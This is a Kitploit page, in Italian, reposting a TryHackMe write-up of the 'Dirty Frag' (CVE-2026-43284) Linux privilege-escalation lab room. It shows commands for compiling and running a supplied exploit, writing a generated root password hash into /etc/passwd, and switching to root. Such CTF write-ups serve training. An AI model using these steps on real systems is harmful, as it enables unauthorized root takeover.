Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — writeup su LPE Linux | Kitploit
Strumenti/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitCTFApprendimento e FormazioneLab e Pratica
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — writeup su LPE Linux

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
141 mese faNon ancora revisionato

TryHackMe — CVE-2026-43284: Dirty Frag

Stanza: CVE-2026-43284: Dirty Frag Categoria: Linux Privilege Escalation Autore: (La mia pagina)

Panoramica

Dirty Frag è una stanza Linux di escalation dei privilegi locali (LPE) a catena costruita attorno a CVE-2026-43284. L'obiettivo è passare da una shell non privilegiata a root sfruttando un proof-of-concept fornito.

Enumerazione iniziale

Elencando la directory di lavoro si rivelano i file forniti per l'exploit:

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — il codice sorgente dell'exploit
  • exp — un binario precompilato (potrebbe non corrispondere all'ambiente di destinazione)
  • README.txt — note d'uso fornite con l'exploit

Compilazione dell'exploit

Poiché il binario exp fornito potrebbe non essere compatibile con l'ambiente esatto del target, è più sicuro ricompilarlo dal sorgente:

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 disabilita le ottimizzazioni del compilatore, mantenendo il comportamento prevedibile e coerente con il sorgente
  • -Wall abilita i warning del compilatore, utili per verificare la build
  • -lutil collega libutil — spesso richiesto quando il codice usa funzioni di pseudo-terminale (pty)

Attivazione della vulnerabilità

root@kitploit:~
$ ./exp

Eseguire l'exploit compilato attiva il difetto sottostante, consentendo l'accesso in scrittura a un file che normalmente dovrebbe essere di sola lettura per gli utenti non privilegiati — in questo caso, /etc/passwd.

Scalata a root

Una volta ottenuto l'accesso in scrittura, viene generato un nuovo hash della password per root:

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

Questo hash viene scritto in /etc/passwd al posto del campo hash esistente di root:

root@kitploit:~
$ nano /etc/passwd

Con la password di root ora nota, il cambio utente è immediato:

root@kitploit:~
$ su root

Acquisizione della flag

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

Lezioni apprese

  • (Inizialmente ci sono voluti 30+ minuti per la comprensione generale, ma una volta capito ho potuto ripetere ripetutamente lo stesso exploit più volte)
  • (Il codice root interno è strano, non puoi selezionare e usare i controlli base quindi invece usi i tasti freccia per navigare fino a root❌ e cambi la X con l'hash che hai creato)

Mitigazioni

  • Mantieni i pacchetti del kernel/sistema aggiornati e patchati

Questo writeup documenta una stanza TryHackMe completata a scopo educativo. L'ambiente di destinazione è una macchina volutamente vulnerabile fornita da TryHackMe.

Scarica lo strumento